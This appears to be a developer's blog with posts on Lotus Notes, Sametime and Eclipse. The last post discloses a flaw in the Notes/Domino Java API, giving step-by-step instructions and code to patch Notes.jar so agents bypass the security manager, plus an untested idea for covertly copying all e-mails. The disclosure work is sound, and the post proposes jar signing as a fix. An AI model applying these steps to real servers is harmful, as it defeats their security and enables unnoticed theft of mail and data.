Composite thinking

In the issue of the Lotus developerWorks newsletter that I received in my inbox today there is a link to an article on creating applications using the Property Broker of Lotus Expeditor (Creating collaborative components for IBM Lotus Expeditor Property Broker). This was kind of funny since it coincided with me receiving a Java newsletter with an article on using the PropertyChangeListener of the Java SDK.

For those not in the know, the Property Broker is the middleware which is used in the Lotus Expeditor framework to dispatch property change events between components and hence is the glue that makes the different components of a composite application work together. The Property Broker is configured either declaratively using an UI or using an API.

The approaches described in the two articles are quite similar and both describe how using a declarative approach (much like extension points in Sametime 7.5 development) allows for a much more flexible solutions that are less brittle and prone to breaking caused by API changes. An added benefit is the absence of compile time checks which means that you may develop and deploy components that doesn’t need to know of any other components that acts on the property changes it fire. The alternative to declarative events is the use of the Observer design pattern and Listener-interfaces en masse e.g. like in Swing.

Reading the articles has really got me thinking about how to leverage these capabilities in new and existing applications. I see great possibilities and the possibility of having many applications work together to form a greater whole.

I think the advent of composite applications will mean that the job of the application architect will become more challenging and you need to change the point of view from which applications are designed and developed. Applications will move from being monolithic entities to being composite and hence you need to decide on which properties to expose and how to work with “client” applications. This you need to decide on at design time. Applications should be designed and built as smaller interconnected components and not as the CD-ROM AutoInstall, 7-databases-in-one, applications of today.

Sounds intriguing but challenging…

All these possibilities are exciting and it will be interesting to see how many of the Lotus Expeditor capabilities will be exposed by the Notes 8 client and how many Notes 8 customers will pick up on it.

Becoming a NOMAD

I received my new 4GB USB key today and have already loaded Notes 7.0.2 on it using Chris’ excellent howto (Lotus Notes 7.0.2 – NOMAD Review). There wasn’t much to it and I didn’t even have to manually add admin.exe and designer.exe since I used a full Notes install image. Very nice… 🙂

The USB key comes loaded with the U3 software so now I need to find an IPSEC VPN client that is U3 compatible or one that can be installed on an USB key to be on Cloud Nine. The client should work with Cisco appliances.

Looking forward to lighter roaming.

J9 Launching plug-in for Sametime 7.5 development

Since I get some questions on how to find this plugin I thought I would post the URL. The plugin can be downloaded here (link to full URL at dev.eclipse.org) or you can get it via this http://tinyurl.com/w97so as long as it works… This is even more relevant where the link posted in the Integration Guide of the Sametime 7.5 Java SDK doesn’t work anymore.

What brilliant person decided to publish a document with link pointing directly into CVS with specifying the revision? I would say that a short redirection link via ibm.com would make much more sense!

IBM Workplace Designer mentioned in Eclipse Magazine


IBM Workplace Designer is mentioned and used as an example on how to leverage Eclipse as a foundation for rich-client applications. Too bad Expeditor, Sametime or Notes 8 isn’t mentioned…

Eclipse Power in IBM Workplace/Domino
“Eclipse is a robust functional platform that IBM Workplace/Domino developers can put to full use in their current and future projects. In this article, we focus on the benefits of Eclipse as a client foundation that has a cross platform, rich UI widget set that is based on native widgets, a rich UI framework, pre-defined dialog basis: Wizards, Preferences, Properties, and other UI: Perspectives, Views, Editors, Workbench (as a base), ActiveX support in SWT on Win32 (platform integration), and a good Help system. Eclipse as a client foundation is an extensible platform that features a plug-in extensibility model, shared programming model with tools development, education that is already developed for tools offerings, core services, extension points, core frameworks, production quality platform with two major releases in the market, and an Open Source code base. “

Eclipse Magazine, Issue 5, December 2006.

Doclinks in Sametime 7.5

You might know that a doclink is actually nothing more than some text in a special format. The below snippet is a doclink to an e-mail in my mail database. As you can see it contains the replica id of the database and the UNID of the view and the document to go to.

Mikkel Heisterberg - Vedr.: Re: mail sync.
<NDL>
<REPLICA C1256833:0079BF90>
<VIEW OF38D46BF5:E8F08834-ON852564B5:00129B2C>
<NOTE OF1B86D647:A8161190-ONC125723D:005E6086>
<HINT>CN=server1/O=Example</HINT>
<REM>Database 'Mikkel Heisterberg', View 'Inbox', Document 'Vedr.: Re: mail sync.'</REM>
</NDL>

The same is the case for a view link except that there’s no document UNID present.

Mikkel Heisterberg - Inbox
<NDL>
<REPLICA C1256833:0079BF90>
<VIEW OF38D46BF5:E8F08834-ON852564B5:00129B2C>
<HINT>CN=server1/O=Example</HINT>
<REM>Mikkel Heisterberg</REM>
</NDL>

A database link is even more slimmed down and it only contains the replica id of the target. For some reason the chat area fail to convert this into a notes:// URL – could be that the regular expression IBM use to match a doclink doesn’t take database links into account.

Mikkel Heisterberg - Inbox
<NDL>
<REPLICA C1256833:0079BF90>
<HINT>CN=server1/O=Example</HINT>
<REM>Mikkel Heisterberg</REM>
</NDL>

Does anyone know whether this is a known issue or something I should report to Lotus Support or even worse write myself? Actually I don’t think it would take too long to write since it’s a slight modification of the acronym sample plugin supplied with the Sametime SDK. I would of cause prefer not to… 😉

Playing around with Notes 8

As mentioned previously I have a couple of friends who work at IBM and while at a social Christmas gathering last night one of them showed me the build of Notes 8 he is running on his work laptop (Notes 8, M3). It was quite funny to actually see the product and I think I have to pay him a visit later in the week to play a little more with the client.

I only played with it briefly but first impression is that it looks nice and more Windows-like (in a positive way!). It sure still looks and feels like Notes but with a touch of Expeditor/Eclipse RCP. The most noticeable differences are that the bookmark bar on the left is gone, there is a Start-style launcher button on the top left and a bar with miniapps (Sametime, RSS feeds, todays calendar etc.) on the right. Other than that the old-style preferences has been replaced with standard Eclipse style preference pages but other than that I looks like you would expect. I don’t think most users will have any problems getting used to it.

I’m sure there’s tons more, but that’s my first impressions. Funny to actually see the client we’ve been hearing about for months now from Mary-Beth Raven and Ed Brill.

I have been doing a lot of Sametime 7.5 plugin development over the last couple of weeks so I can really see the benefit of the miniapp-sidebar. I think miniapps and the concept of the sidebar is going to be a really valuable addition to the application portfolio. I need to look more into this as I explore the client and see how the miniapps are wired into the client and how to make them respond to events in the client such as opening new applications etc.

As an aside I really hope we get to share miniapps between Sametime and Notes 8 without having to recompile… I have my doubts of this though, as the extension point used in Sametime 7.5 for miniapps looks and sounds quite Sametime 7.5 specific but I hope I’m wrong.

Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

DISCLAIMER
The information below is provided as-is and I cannot be held liable for any damages, direct or indirect, caused by the information in this post or based on the below findings. The information here is offered in the interest of full disclosure. I have been working with IBM Lotus to diagnose and pinpoint the exact consequences of the below findings since May 2006.

Description

As you might know a central security measure in the Notes/Domino security infrastructure is the difference between restricted and unrestricted operations. Only users granted unrestricted access may perform sensitive operations such as disk I/O and manipulating the system clock. The implementation flaw I found in the Java API of Notes/Domino allows me to circumvent these restrictions and hence circumvent the security settings of the Domino server.

As such the guidelines given in this post could also be used to fully replace the Java API and perform additional operations without the knowledge of the owner of the Domino server or Notes client.

Prerequisites

  • Disk access to the Domino server or Notes client or be able to write an agent or other piece of code that may accomplish the task for you.

Steps to reproduce

Below I describe the steps necessary to circumvent the SecurityManager and/or hide malicious code.

  1. Obtain a copy of the Notes.jar file from the Domino server and copy it to a local workstation.
  2. Unpack the archive using the jar-command.
  3. Decompile the code (I used the JODE version 1.1.2-pre2 decompiler from http://jode.sourceforge.net)
  4. Using Eclipse, or similar, edit the code in the constructor of the lotus.notes.AgentSecurityContext class as shown below:
    public AgentSecurityContext(ThreadGroup threadgroup, boolean bool) {
      m_restricted = bool;
      m_file_read = true;
      m_file_write = true;
      m_net_access = true;
      m_class_loader = true;
      m_extern_exec = true;
      m_native_link = true;
      m_system_props = true;
    
      try {
        AgentSecurityManager agentsecuritymanager = (AgentSecurityManager) System
          .getSecurityManager();
        if (agentsecuritymanager != null)
        agentsecuritymanager.newSecurityContext(this, threadgroup);
       } catch (ClassCastException classcastexception) {
         /* empty */
       }
    }
    
  5. Compile the class and replace the version from the unpacked Notes.jar
  6. Create a new Notes.jar with the manipulated code and replace the Notes.jar on the server. You might have to shutdown the server/client to be able to replace the file.

Using a Domino server in a virtual machine I created a text file called readme.txt in the root of the c-drive on the server and ran the below agent as scheduled on the server. The agent tries to read data from the readme.txt file in the root of the c-drive on the local server (Windows 2000 Server). As expected the JVM throws a java.lang.SecurityException using the Notes.jar supplied with the Domino installation. If I replace the Notes.jar supplied by IBM with my manipulated Notes.jar the agent runs to completion without any incident thus circumventing the security measures put in place by the Domino server.

import lotus.domino.*;
import java.io.*;

public class JavaAgent extends AgentBase {
   public void NotesMain() {
      try {
         Session session = getSession();
         AgentContext agentContext = session.getAgentContext();

         System.out.println("Starting to run agent...");
         FileReader r = new FileReader("c:\readme.txt");
         StringBuffer buffer = new StringBuffer();
         char[] data = new char[128];
         r.read(data, 0, 127);
         buffer.append(data);
         System.out.println("File data: " + buffer.toString());
         r.close();

      } catch(Exception e) {
         e.printStackTrace();
      }

      System.out.println("Done running agent...");
   }
}

Consequences

One thing is being able to circumvent the restricted/unrestricted security measure of the Domino server. Another thing is that this can be done without the administrator or users knowing about it.

As mentioned above you might even be able to use the steps to replace some of the core classes (such as the class implementing the Document interface). By doing this you could have the manipulated class send you a copy of all e-mails generated using the Document.send() method or to add a specific user to all reader/author fields being written to documents.

This should be possible since all the Domino API types are interfaces and as such are open for re-implementation. It does however also mean that you have to manipulate the factory methods of the API.

I must stress that I haven’t tried this myself – yet…

Suggestions

Issues like this could be avoided by digitally signing the Notes.jar file provided by IBM and have the Domino server and Notes client verify the signature of the jar-file before loading classes from it. Since a lock is placed on the jar-file by operating system once read (at least on Windows), the impact on performance should be minimal since the jar-file only needs to be checked once.

As an aside I can mention that some of the jar-files provided with the Domino server/Notes client are digitally signed by IBM already:

  • ibmjcefips.jar
  • ibmjceprovider.jar
  • ibmpkcs11.jar
  • ibmpkcs11impl.jar

Resources